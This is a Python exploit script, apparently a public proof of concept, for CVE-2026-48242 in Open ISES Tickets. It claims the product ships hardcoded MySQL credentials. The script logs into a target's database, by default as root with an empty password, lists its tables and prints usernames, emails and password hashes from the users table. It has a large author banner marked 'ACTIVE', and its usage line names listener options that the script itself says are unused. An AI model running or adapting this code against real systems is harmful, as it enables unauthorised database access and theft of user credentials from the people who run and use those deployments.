#!/usr/bin/env python3
# Exploit Title: Open ISES Tickets < 3.44.2 - Hardcoded MySQL Credentials
# CVE: CVE-2026-48242
# Date: 2026-05-25
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://github.com/openises/tickets
# Software Link: https://github.com/openises/tickets
# Affected: Open ISES Tickets < 3.44.2
# Tested on: Linux
# Category: WebApp
# Platform: PHP/MySQL
# Exploit Type: Credential Access
# CVSS: 9.1
# CWE : CWE-798
# Description: Open ISES Tickets contains hardcoded MySQL credentials in import functionality allowing unauthenticated database access.
# Fixed in: 3.44.2
# Usage: python3 exploit.py <target> --lhost <your_ip> --lport <your_port>
#
# Examples:
# python3 exploit.py 192.168.1.100
#
# Options:
#
# Notes:
#
# How to Use
#
# Step 1:
print(r"""
╔════════════════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗ ║
║ ██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██╗ ║
║ ██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ██████╔╝ ║
║ ██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║
║ ██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ║
║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ║
║ ║
║ [ b a n y a m e r _ s e c u r i t y ] ║
║ ║
║ ▸ Silent Hunter | Shadow Presence | Digital Intel ◂ ║
║ ║
║ Operator : Mohammed Idrees Banyamer • Jordan 🇯🇴 ║
║ Handle : @banyamer_security ║
║ ║
║ Exploit : CVE-2026-48242 ║
║ Target : Open ISES Tickets - Hardcoded MySQL Credentials ║
║ ║
║ Status : ACTIVE ║
║ ║
╚════════════════════════════════════════════════════════════════════════════════════════════╝
""")
import sys
import mysql.connector
from mysql.connector import Error
import argparse
parser = argparse.ArgumentParser(description="CVE-2026-48242 PoC")
parser.add_argument("target", help="Target hostname or IP")
parser.add_argument("--port", type=int, default=3306, help="MySQL port")
parser.add_argument("--user", default="root", help="MySQL username")
parser.add_argument("--password", default="", help="MySQL password")
parser.add_argument("--database", default="tickets", help="Database name")
parser.add_argument("--lhost", help="Your IP (unused in this exploit)")
parser.add_argument("--lport", type=int, help="Your port (unused in this exploit)")
args = parser.parse_args()
print("[+] Open ISES Tickets CVE-2026-48242 PoC")
print(f"[+] Target: {args.target}:{args.port}")
print(f"[+] Credentials: {args.user} / {args.password or '(empty)'}")
print("-" * 70)
try:
connection = mysql.connector.connect(
host=args.target,
port=args.port,
user=args.user,
password=args.password,
database=args.database,
connect_timeout=10
)
if connection.is_connected():
print("[+] SUCCESS! Connected using hardcoded credentials!")
cursor = connection.cursor()
cursor.execute("SHOW TABLES")
tables = cursor.fetchall()
print(f"\n[+] Found {len(tables)} tables:")
for table in tables:
print(f" - {table[0]}")
try:
cursor.execute("SELECT username, email, password FROM users LIMIT 5")
users = cursor.fetchall()
if users:
print(f"\n[+] Sample users:")
for user in users:
print(f" {user[0]} | {user[1]} | {user[2][:50]}...")
except:
pass
cursor.close()
connection.close()
print("\n[+] Database access successful.")
except Error as e:
print(f"[-] Connection failed: {e}")
print("[!] Try default credentials: root / (empty), root / tickets, etc.")
sys.exit(1)
except Exception as e:
print(f"[-] Error: {e}")
sys.exit(1)
